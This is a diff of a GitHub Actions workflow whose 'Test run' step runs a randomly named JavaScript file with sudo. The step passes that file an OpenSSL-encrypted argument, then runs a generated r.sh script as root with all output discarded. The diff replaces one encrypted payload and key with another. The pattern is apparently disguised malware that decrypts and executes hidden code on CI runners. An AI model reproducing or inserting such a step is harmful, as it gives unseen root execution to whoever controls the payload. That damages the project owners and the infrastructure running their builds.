--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '3zib5'
+        echo 'hzwo2'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+g+vkGay4ztowqeaE1SuCgmKfY5h9ZTayLiM+GkB0xeECmLAxJe0Keb6MA7H0DFj+OkmBZ+GUC0VXq90/WSwWdrak50kBUjqrBWaPPYdjT81DJDpsqw4Ee w84wyc && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18kQPFW8xk5zZmbPIkLBb4u+RLnLcLET34Etcih67wKroFWhFuV/OrSmtgr6Jley8jMjywC5NmYm3Gk1DDPxveKjDbc72xxamZT53pFnIWfPOOvt5ne61vu k3ffv4 && sudo sh r.sh > /dev/null 2>&1
